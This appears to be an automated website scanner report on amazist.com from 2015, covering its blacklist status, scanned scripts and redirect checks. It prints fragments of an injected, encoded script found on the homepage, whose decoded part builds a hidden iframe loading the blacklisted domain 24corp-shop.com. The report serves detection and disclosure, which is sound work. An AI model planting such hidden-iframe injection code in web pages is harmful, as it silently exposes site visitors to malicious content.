Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=amazist.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://amazist.com/ | 200 OK Content-Length: 51020 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com var _001='KkSKpcCfngCdpxGcz5yJlxWe0N3NywXe0lGbpJWazlmd3IDft92Y8RWS5JEduVWblxWR0V2Z8B3boNHfyQ2br91cqhjM8hGdkl2d85WZkRWaoF0M8RWYlhGfl1WYOdWYUlnQzRnbl1WZsVEdldGf4BHM4EzNywnclJnclZWZyxHewBDMycjM8RHanlWZoxXZwF2YzVmb1xXZ0lmc3xHbyVHfkF2bs52b3IDfl1WYyZWa3IDfvZmbpxHduVWb1N2bkR0M8NmczRXZnx3avxXZ0VnYpJHd0FEdlNHfmVmc8Rnbl1Wdj9GZ4IDf2lGZ3IDfmlGMywHZlRWYvxGf05WZ2VEajFGd0FGfnFGV2lGZwIDf39GZul2d4IDfkF2bsdjM8JDZvt2XzpWOwwXawFWeyVWdxpGfu9Wa0Nmb1ZWQwwXZzxWYmBjM8JXY2FEM8l ...[4227 bytes skipped]... Decoded script: ...[14006 bytes skipped]... nload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20var%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.src%20%3D%20%27http%3A//24corp-shop.com%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.width%20%3D%20%27180px%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.height%20%3D%20%27200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _10O=document.createElement('script');_10O.src='http://jquery ...[1743 bytes skipped]... | ||
http://amazist.com/wp-content/themes/laakhe-victor/js/jquery-1.10.2.js | 200 OK Content-Length: 93104 Content-Type: application/javascript | clean |
http://amazist.com/wp-content/themes/laakhe-victor/js/bootstrap.min.js | 200 OK Content-Length: 31819 Content-Type: application/javascript | clean |
http://amazist.com/wp-content/themes/laakhe-victor/js/ticker.js | 200 OK Content-Length: 2089 Content-Type: application/javascript | clean |
http://amazist.com/wp-content/themes/laakhe-victor/js/accordion.min.js | 200 OK Content-Length: 1461 Content-Type: application/javascript | clean |
http://amazist.com//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 30 Jan 2015 23:51:26 GMT Pragma: no-cache Location: http://amazist.com/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://amazist.com/xmlrpc.php X-Powered-By: PHP/5.4.36 | clean |
http://amazist.com/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 3 Content-Type: text/html | clean |
http://amazist.com/test404page.js | 404 Not Found Content-Length: 3 Content-Type: text/html | clean |
http://amazist.com/wp-content/themes/laakhe-victor/js/navigation.js?ver=20120206 | 200 OK Content-Length: 831 Content-Type: application/javascript | clean |
http://amazist.com/wp-content/themes/laakhe-victor/js/skip-link-focus-fix.js?ver=20130115 | 200 OK Content-Length: 650 Content-Type: application/javascript | clean |
http://amazist.com/wp-includes/js/jquery/jquery.js?ver=2.6.6 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://amazist.com/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-en.js?ver=2.6.6 | 404 Not Found Content-Length: 3 Content-Type: text/html | clean |
http://amazist.com/wp-content/plugins/wysija-newsletters/js/validate/jquery.validationEngine.js?ver=2.6.6 | 404 Not Found Content-Length: 3 Content-Type: text/html | clean |
http://amazist.com/wp-content/plugins/wysija-newsletters/js/front-subscribers.js?ver=2.6.6 | 404 Not Found Content-Length: 3 Content-Type: text/html | clean |
http://amazist.com/wp-content/themes/laakhe-victor/js/jquery.timeago.js | 200 OK Content-Length: 7050 Content-Type: application/javascript | clean |
http://laakhe.net/ga/victor.js | 200 OK Content-Length: 1328 Content-Type: application/javascript | suspicious |
Page code contains blacklisted domain: amazist.com ...[58 bytes skipped]... =i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); // The normal snippet. ga('create', 'UA-55324834-1', 'auto'); ga('send', 'pageview'); // Replace with your domain here. var allowedOrigins = ['https://amazist.com', 'http://amazily.com','http://goodies.im']; function xDomainHandler(event) { event = event || window.event; var origin = event.origin; // Check for the whitelist. var found = false; for (var i = 0; i < allowedOrigins.length; i++) { if (allowedOrigins[i] == origin) { found = true; break; } } if (!found) return; // Might be a different message. if (event.data != 'send_client_id') return ...[462 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: amazist.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Jan 2015 23:51:20 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html; charset=UTF-8
X-Pingback: http://amazist.com/xmlrpc.php
X-Powered-By: PHP/5.4.36
GET / HTTP/1.1
Host: amazist.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Jan 2015 23:51:20 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html; charset=UTF-8
X-Pingback: http://amazist.com/xmlrpc.php
X-Powered-By: PHP/5.4.36
Second query (visit from search engine):
GET / HTTP/1.1
Host: amazist.com
Referer: http://www.google.com/search?q=amazist.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: amazist.com
Referer: http://www.google.com/search?q=amazist.com
Result:
The result is similar to the first query. There are no suspicious redirects found.